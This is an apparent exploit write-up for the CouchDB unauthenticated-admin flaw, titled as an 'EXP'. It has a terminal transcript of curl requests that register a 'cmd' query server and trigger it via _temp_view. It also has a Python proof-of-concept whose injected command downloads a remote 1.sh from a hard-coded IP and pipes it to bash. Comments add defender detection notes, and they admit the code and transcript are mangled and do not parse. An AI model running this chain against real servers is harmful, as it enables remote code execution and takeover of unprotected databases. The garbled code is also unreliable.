[email protected]:~# curl-x PUT ' http://3d9da15e7acfd5730.jie.sangebaimao.com/_config/query_servers/cmd '-d ' " /sbin/ifconfig>/tmp/6666 "'" [email protected]:~# curl-x PUT ' http://3d9da15e7acfd5730.jie.sangebaimao.com /vultest ' {"OK": true}[email protected]:~# curl-x PUT ' http://3d9da15e7acfd5730.jie.sangebaimao.com/vultest/ Vul '-d ' {"_id": "770895a97726d5ca6d70a22173005c7b"} ' {"OK": true, "id": "Vul", "Rev": " 1-967a00dff5e02add41819138abb3284d "}[email protected]:~# curl-x POST"/http// 3d9da15e7acfd5730.jie.sangebaimao.com/vultest/_temp_view?limit=11 '-d ' {"Language": "cmd", "Map": ""} '-H ' Content-type:application/json ' {"error": "EXIT", "Reason": "{{badmatch,{error,{bad_return_value,{os_process_error, {exit_status,0}}}}},\n [{couch_query_servers,new_process,3,\n [{file,\ ' couch_query_servers.erl\ '},{l ine,477}]},\n {couch_query_servers,lang_proc,3,\n [{file,\ "couch_query_servers.erl\"},{line,462}]}, \ n {couch_query_servers,handle_call,3,\n [{file,\ "couch_query_servers.erl\"},{line,334}]},\n {gen_server,handle_msg,5,[{file,\ "Gen_se Rver.erl\ "},{line,585}]},\n {proc_lib,init_p_do_apply,3,[{file,\" proc_lib.erl\ "},{line,239}]}]}"}[email protected]:~#
PY:
# Proof-of-concept for the CouchDB unauthenticated-admin ("unauthorized access") issue
# the page is about. As written, the one-liner builds four curl commands and runs each
# through os.system():
#   cmd  - PUT /_config/query_servers/cmd   registers a new "cmd" query server whose
#          command fetches a remote 1.sh and pipes it to bash (the file-write to
#          /tmp/6666 mirrors the ifconfig variant in the transcript above).
#   cmd1 - PUT /vultest                     creates a database.
#   cmd2 - PUT /vultest/vul                 creates one document so the view has input.
#   cmd3 - POST /vultest/_temp_view         with {"Language": "cmd"} makes the server
#          spawn the registered query server, i.e. run the configured command.
# Why it works at all: the _config endpoint accepted the PUT without any credentials,
# so the whole chain rides on an unauthenticated admin; the Erlang os_process_error /
# exit_status 0 in the transcript is the server complaining that the spawned "query
# server" exited immediately, which happens after the command has already run (presumably;
# the transcript does not show /tmp/6666 being read back).
# Defender notes: the unusual parts to alert on are writes to /_config/query_servers/*
# and _temp_view requests naming a non-standard language; the underlying condition is
# an admin interface reachable without a password on a network-facing instance.
# NOTE(review): the pasted text is case- and whitespace-mangled (Os.system, SETP4, Pass,
# unbalanced quotes in cmd3), so it does not parse as Python as shown; it is kept as-is
# for the record, not repaired.
defCouchDb (URL):PrintURL cmd='curl-x PUT \ ''+url +'/_config/query_servers/cmd\ ''+'- D'+'\ ' "/usr/bin/curl http://192.184.40.86:6554/1.sh|bash>/tmp/6666" \ ''cmd1='curl-x PUT \ ''+url +'/vultest\ ''CMD2='curl-x PUT \ ''+url +'/vultest/vul\ ''+'- D'+'\ ' {"_id": "770895a97726d5ca6d70a22173005c7b"}\ ''cmd3='curl-x POST \ ''+url +'/vultest/_temp_view?limit=11\ ''+'- D'+'\ ' {"Language": "cmd", "Map": "}\ "'+'- H' '\ ' content-type:application/json\ '' #Print Cmd3Step1 =os.system (cmd) step2=Os.system (cmd1) step3=Os.system (CMD2) SETP4=Os.system (CMD3)Pass
Reference:
http://drops.wooyun.org/papers/16030
CouchDB unauthorized access vulnerability: arbitrary system command execution EXP